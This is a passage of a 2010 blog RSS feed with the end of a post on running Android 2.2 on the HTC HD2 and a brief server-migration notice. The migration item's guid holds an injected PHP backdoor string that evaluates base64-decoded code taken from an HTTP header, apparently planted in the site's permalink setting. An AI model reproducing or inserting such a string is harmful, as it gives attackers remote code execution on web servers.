</ol>
<p>If all went well (no errors reported etc) then the new drivers are now on the device, and the reboot to WinMo should happen.</p>
<p>Re-Launch Android either via file explorer again (running the two exe’s) or get one of the many launchers to do it for you. Try <a href="http://genusproject.com/uncategorized/my-first-windows-mobile-app-boot-android-on-htc-hd2/" target="_blank">this one</a> for example.</p>
<p>I hope that helps someone that’s trying to play with Android on the HD2. Like I say, for me it works day to day without issue. I do recommend installing <a href="http://forum.xda-developers.com/showthread.php?t=505419" target="_blank">SetCPU</a> though, and setting it up to scale the CPU, and slow it down when screen off etc.</p>
<p>Thanks to the guys over at the <a href="http://irclog.netripper.com/?chan=htc-linux" target="_blank">HTC-Linux channel</a> for the information used here.</p>
<p>NOTE : Uploading a version of matcc 1.5 rom with changes already done, will post the links when uploaded. Please note though, Mattc will NOT support this release if there is issues, however do look in his thread on <a href="http://forum.xda-developers.com/showthread.php?t=736545" target="_blank">XDA-Developers</a> for possible fixes. I’ve changed nothing else in his rom besides the drivers and kernel version.</p>
<p>Links : <a title="JEAVMCS0D8" href="http://www.multiupload.com/JEAVMCS0D8">Download Links</a></p>

<p><a href="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/0/da"><img src="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/1/da"><img src="http://feedads.g.doubleclick.net/~a/27AWtk0ydlWh0UWEIrkV_LemZSk/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=iV7oJThJS5A:S6waisPinBQ:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=iV7oJThJS5A:S6waisPinBQ:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/iV7oJThJS5A" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/</feedburner:origLink></item>
		<item>
		<title>Server Migration</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/6quUX1DMBKg/</link>
		<comments>http://www.nakedcleaner.com/2010/04/server-migration/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 00:13:14 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/04/13/server-migration/%&amp;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&amp;%/</guid>
		<description>We are currently moving host’s. Please bare with us.</description>
			<content:encoded><![CDATA[<p>We are currently moving host’s. Please bare with us.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/0/da"><img src="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/1/da"><img src="http://feedads.g.doubleclick.net/~a/tV8nQYee4gt-fUr_JK3DuwVZ1s0/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=6quUX1DMBKg:OzZ7xF5-O6I:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=6quUX1DMBKg:OzZ7xF5-O6I:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/6quUX1DMBKg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/04/server-migration/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/04/server-migration/</feedburner:origLink></item>
	</channel>
</rss>

